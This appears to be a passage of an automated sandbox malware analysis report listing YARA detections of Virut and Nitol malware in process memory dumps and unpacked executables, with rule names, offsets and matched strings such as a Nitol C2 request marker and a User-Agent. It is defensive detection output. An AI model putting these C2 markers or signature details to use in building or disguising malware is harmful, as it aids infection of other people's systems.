00000019.00000002.2742301520.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000011.00000002.2742837753.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001D.00000002.2742525977.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000011.00000002.2743537432.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000016.00000002.2742450602.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000A.00000002.2741745861.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000025.00000000.1564612279.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001A.00000002.2742498334.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: hrl97BF.tmp PID: 5732	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: hrl97AF.tmp PID: 3388	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: winlogon.exe PID: 584	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: lsass.exe PID: 640	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 752	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: fontdrvhost.exe PID: 776	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: fontdrvhost.exe PID: 784	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 880	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 928	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: dwm.exe PID: 992	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 436	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 376	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 792	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1028	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: hrlA367.tmp PID: 3916	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1036	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1124	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1148	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1160	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1220	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1336	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1348	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1392	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1408	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1504	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1584	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1640	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1656	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1680	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1800	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1836	JoeSecurity_Virut	Yara detected Virut	Joe Security
Click to see the 109 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.rundll32.exe.10004090.1.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x4b24:$xc2: GET ^&&%$%$^ 0x4b55:$xc2: GET ^&&%$%$^ 0x4b86:$xc2: GET ^&&%$%$^ 0x4bb7:$xc2: GET ^&&%$%$^ 0x4be8:$xc2: GET ^&&%$%$^ 0x4c19:$xc2: GET ^&&%$%$^ 0x4c4a:$xc2: GET ^&&%$%$^ 0x4c7b:$xc2: GET ^&&%$%$^ 0x4cac:$xc2: GET ^&&%$%$^ 0x4cdd:$xc2: GET ^&&%$%$^ 0x4d0e:$xc2: GET ^&&%$%$^ 0x4d3f:$xc2: GET ^&&%$%$^ 0x4d70:$xc2: GET ^&&%$%$^ 0x4da1:$xc2: GET ^&&%$%$^ 0x4dd2:$xc2: GET ^&&%$%$^ 0x4e03:$xc2: GET ^&&%$%$^ 0x4e34:$xc2: GET ^&&%$%$^ 0x4e65:$xc2: GET ^&&%$%$^ 0x4e96:$xc2: GET ^&&%$%$^ 0x4ec7:$xc2: GET ^&&%$%$^ 0x4b51:$n1: .htmGET
30.0.hrlAF3E.tmp.400000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
30.0.hrlAF3E.tmp.400000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
20.2.rundll32.exe.10004090.2.raw.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
20.2.rundll32.exe.10004090.2.raw.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
21.2.hrlA367.tmp.400000.0.unpack	JoeSecurity_Virut	Yara detected Virut	Joe Security
21.2.hrlA367.tmp.400000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
21.2.hrlA367.tmp.400000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
0.2.loaddll32.exe.10000000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x921f:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
0.2.loaddll32.exe.10000000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x7454:$xc2: GET ^&&%$%$^ 0x7485:$xc2: GET ^&&%$%$^ 0x74b6:$xc2: GET ^&&%$%$^ 0x74e7:$xc2: GET ^&&%$%$^ 0x7518:$xc2: GET ^&&%$%$^ 0x7549:$xc2: GET ^&&%$%$^ 0x757a:$xc2: GET ^&&%$%$^ 0x75ab:$xc2: GET ^&&%$%$^ 0x75dc:$xc2: GET ^&&%$%$^ 0x760d:$xc2: GET ^&&%$%$^ 0x763e:$xc2: GET ^&&%$%$^ 0x766f:$xc2: GET ^&&%$%$^ 0x76a0:$xc2: GET ^&&%$%$^ 0x76d1:$xc2: GET ^&&%$%$^ 0x7702:$xc2: GET ^&&%$%$^ 0x7733:$xc2: GET ^&&%$%$^ 0x7764:$xc2: GET ^&&%$%$^ 0x7795:$xc2: GET ^&&%$%$^ 0x77c6:$xc2: GET ^&&%$%$^ 0x77f7:$xc2: GET ^&&%$%$^ 0x7481:$n1: .htmGET
34.0.zvhcfa.exe.400000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
34.0.zvhcfa.exe.400000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
7.2.hrl97AF.tmp.400000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
7.2.hrl97AF.tmp.400000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
20.2.rundll32.exe.10000000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x921f:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
20.2.rundll32.exe.10000000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x7454:$xc2: GET ^&&%$%$^ 0x7485:$xc2: GET ^&&%$%$^ 0x74b6:$xc2: GET ^&&%$%$^ 0x74e7:$xc2: GET ^&&%$%$^ 0x7518:$xc2: GET ^&&%$%$^ 0x7549:$xc2: GET ^&&%$%$^ 0x757a:$xc2: GET ^&&%$%$^ 0x75ab:$xc2: GET ^&&%$%$^ 0x75dc:$xc2: GET ^&&%$%$^ 0x760d:$xc2: GET ^&&%$%$^ 0x763e:$xc2: GET ^&&%$%$^ 0x766f:$xc2: GET ^&&%$%$^ 0x76a0:$xc2: GET ^&&%$%$^ 0x76d1:$xc2: GET ^&&%$%$^ 0x7702:$xc2: GET ^&&%$%$^ 0x7733:$xc2: GET ^&&%$%$^ 0x7764:$xc2: GET ^&&%$%$^ 0x7795:$xc2: GET ^&&%$%$^ 0x77c6:$xc2: GET ^&&%$%$^ 0x77f7:$xc2: GET ^&&%$%$^ 0x7481:$n1: .htmGET
30.2.hrlAF3E.tmp.400000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
30.2.hrlAF3E.tmp.400000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
0.2.loaddll32.exe.10004090.1.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x4b24:$xc2: GET ^&&%$%$^ 0x4b55:$xc2: GET ^&&%$%$^ 0x4b86:$xc2: GET ^&&%$%$^ 0x4bb7:$xc2: GET ^&&%$%$^ 0x4be8:$xc2: GET ^&&%$%$^ 0x4c19:$xc2: GET ^&&%$%$^ 0x4c4a:$xc2: GET ^&&%$%$^ 0x4c7b:$xc2: GET ^&&%$%$^ 0x4cac:$xc2: GET ^&&%$%$^ 0x4cdd:$xc2: GET ^&&%$%$^ 0x4d0e:$xc2: GET ^&&%$%$^ 0x4d3f:$xc2: GET ^&&%$%$^ 0x4d70:$xc2: GET ^&&%$%$^ 0x4da1:$xc2: GET ^&&%$%$^ 0x4dd2:$xc2: GET ^&&%$%$^ 0x4e03:$xc2: GET ^&&%$%$^ 0x4e34:$xc2: GET ^&&%$%$^ 0x4e65:$xc2: GET ^&&%$%$^ 0x4e96:$xc2: GET ^&&%$%$^ 0x4ec7:$xc2: GET ^&&%$%$^ 0x4b51:$n1: .htmGET
20.2.rundll32.exe.10004090.2.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x4b24:$xc2: GET ^&&%$%$^ 0x4b55:$xc2: GET ^&&%$%$^ 0x4b86:$xc2: GET ^&&%$%$^ 0x4bb7:$xc2: GET ^&&%$%$^ 0x4be8:$xc2: GET ^&&%$%$^ 0x4c19:$xc2: GET ^&&%$%$^ 0x4c4a:$xc2: GET ^&&%$%$^ 0x4c7b:$xc2: GET ^&&%$%$^ 0x4cac:$xc2: GET ^&&%$%$^ 0x4cdd:$xc2: GET ^&&%$%$^ 0x4d0e:$xc2: GET ^&&%$%$^ 0x4d3f:$xc2: GET ^&&%$%$^ 0x4d70:$xc2: GET ^&&%$%$^ 0x4da1:$xc2: GET ^&&%$%$^ 0x4dd2:$xc2: GET ^&&%$%$^ 0x4e03:$xc2: GET ^&&%$%$^ 0x4e34:$xc2: GET ^&&%$%$^ 0x4e65:$xc2: GET ^&&%$%$^ 0x4e96:$xc2: GET ^&&%$%$^ 0x4ec7:$xc2: GET ^&&%$%$^ 0x4b51:$n1: .htmGET
4.2.rundll32.exe.10004090.1.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x4b24:$xc2: GET ^&&%$%$^ 0x4b55:$xc2: GET ^&&%$%$^ 0x4b86:$xc2: GET ^&&%$%$^ 0x4bb7:$xc2: GET ^&&%$%$^ 0x4be8:$xc2: GET ^&&%$%$^ 0x4c19:$xc2: GET ^&&%$%$^ 0x4c4a:$xc2: GET ^&&%$%$^ 0x4c7b:$xc2: GET ^&&%$%$^ 0x4cac:$xc2: GET ^&&%$%$^ 0x4cdd:$xc2: GET ^&&%$%$^ 0x4d0e:$xc2: GET ^&&%$%$^ 0x4d3f:$xc2: GET ^&&%$%$^ 0x4d70:$xc2: GET ^&&%$%$^ 0x4da1:$xc2: GET ^&&%$%$^ 0x4dd2:$xc2: GET ^&&%$%$^ 0x4e03:$xc2: GET ^&&%$%$^ 0x4e34:$xc2: GET ^&&%$%$^ 0x4e65:$xc2: GET ^&&%$%$^ 0x4e96:$xc2: GET ^&&%$%$^ 0x4ec7:$xc2: GET ^&&%$%$^ 0x4b51:$n1: .htmGET
7.0.hrl97AF.tmp.400000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
7.0.hrl97AF.tmp.400000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
3.2.rundll32.exe.10000000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x921f:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
3.2.rundll32.exe.10000000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x7454:$xc2: GET ^&&%$%$^ 0x7485:$xc2: GET ^&&%$%$^ 0x74b6:$xc2: GET ^&&%$%$^ 0x74e7:$xc2: GET ^&&%$%$^ 0x7518:$xc2: GET ^&&%$%$^ 0x7549:$xc2: GET ^&&%$%$^ 0x757a:$xc2: GET ^&&%$%$^ 0x75ab:$xc2: GET ^&&%$%$^ 0x75dc:$xc2: GET ^&&%$%$^ 0x760d:$xc2: GET ^&&%$%$^ 0x763e:$xc2: GET ^&&%$%$^ 0x766f:$xc2: GET ^&&%$%$^ 0x76a0:$xc2: GET ^&&%$%$^ 0x76d1:$xc2: GET ^&&%$%$^ 0x7702:$xc2: GET ^&&%$%$^ 0x7733:$xc2: GET ^&&%$%$^ 0x7764:$xc2: GET ^&&%$%$^ 0x7795:$xc2: GET ^&&%$%$^ 0x77c6:$xc2: GET ^&&%$%$^ 0x77f7:$xc2: GET ^&&%$%$^ 0x7481:$n1: .htmGET
28.2.rundll32.exe.10004090.1.raw.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
28.2.rundll32.exe.10004090.1.raw.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
4.2.rundll32.exe.10000000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x921f:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
4.2.rundll32.exe.10000000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x7454:$xc2: GET ^&&%$%$^ 0x7485:$xc2: GET ^&&%$%$^ 0x74b6:$xc2: GET ^&&%$%$^ 0x74e7:$xc2: GET ^&&%$%$^ 0x7518:$xc2: GET ^&&%$%$^ 0x7549:$xc2: GET ^&&%$%$^ 0x757a:$xc2: GET ^&&%$%$^ 0x75ab:$xc2: GET ^&&%$%$^ 0x75dc:$xc2: GET ^&&%$%$^ 0x760d:$xc2: GET ^&&%$%$^ 0x763e:$xc2: GET ^&&%$%$^ 0x766f:$xc2: GET ^&&%$%$^ 0x76a0:$xc2: GET ^&&%$%$^ 0x76d1:$xc2: GET ^&&%$%$^ 0x7702:$xc2: GET ^&&%$%$^ 0x7733:$xc2: GET ^&&%$%$^ 0x7764:$xc2: GET ^&&%$%$^ 0x7795:$xc2: GET ^&&%$%$^ 0x77c6:$xc2: GET ^&&%$%$^ 0x77f7:$xc2: GET ^&&%$%$^ 0x7481:$n1: .htmGET
28.2.rundll32.exe.10004090.1.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x4b24:$xc2: GET ^&&%$%$^ 0x4b55:$xc2: GET ^&&%$%$^ 0x4b86:$xc2: GET ^&&%$%$^ 0x4bb7:$xc2: GET ^&&%$%$^ 0x4be8:$xc2: GET ^&&%$%$^ 0x4c19:$xc2: GET ^&&%$%$^ 0x4c4a:$xc2: GET ^&&%$%$^ 0x4c7b:$xc2: GET ^&&%$%$^ 0x4cac:$xc2: GET ^&&%$%$^ 0x4cdd:$xc2: GET ^&&%$%$^ 0x4d0e:$xc2: GET ^&&%$%$^ 0x4d3f:$xc2: GET ^&&%$%$^ 0x4d70:$xc2: GET ^&&%$%$^ 0x4da1:$xc2: GET ^&&%$%$^ 0x4dd2:$xc2: GET ^&&%$%$^ 0x4e03:$xc2: GET ^&&%$%$^ 0x4e34:$xc2: GET ^&&%$%$^ 0x4e65:$xc2: GET ^&&%$%$^ 0x4e96:$xc2: GET ^&&%$%$^ 0x4ec7:$xc2: GET ^&&%$%$^ 0x4b51:$n1: .htmGET
6.0.hrl97BF.tmp.400000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
6.0.hrl97BF.tmp.400000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
21.0.hrlA367.tmp.400000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
21.0.hrlA367.tmp.400000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
28.2.rundll32.exe.10000000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x921f:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
28.2.rundll32.exe.10000000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x7454:$xc2: GET ^&&%$%$^ 0x7485:$xc2: GET ^&&%$%$^ 0x74b6:$xc2: GET ^&&%$%$^ 0x74e7:$xc2: GET ^&&%$%$^ 0x7518:$xc2: GET ^&&%$%$^ 0x7549:$xc2: GET ^&&%$%$^ 0x757a:$xc2: GET ^&&%$%$^ 0x75ab:$xc2: GET ^&&%$%$^ 0x75dc:$xc2: GET ^&&%$%$^ 0x760d:$xc2: GET ^&&%$%$^ 0x763e:$xc2: GET ^&&%$%$^ 0x766f:$xc2: GET ^&&%$%$^ 0x76a0:$xc2: GET ^&&%$%$^ 0x76d1:$xc2: GET ^&&%$%$^ 0x7702:$xc2: GET ^&&%$%$^ 0x7733:$xc2: GET ^&&%$%$^ 0x7764:$xc2: GET ^&&%$%$^ 0x7795:$xc2: GET ^&&%$%$^ 0x77c6:$xc2: GET ^&&%$%$^ 0x77f7:$xc2: GET ^&&%$%$^ 0x7481:$n1: .htmGET
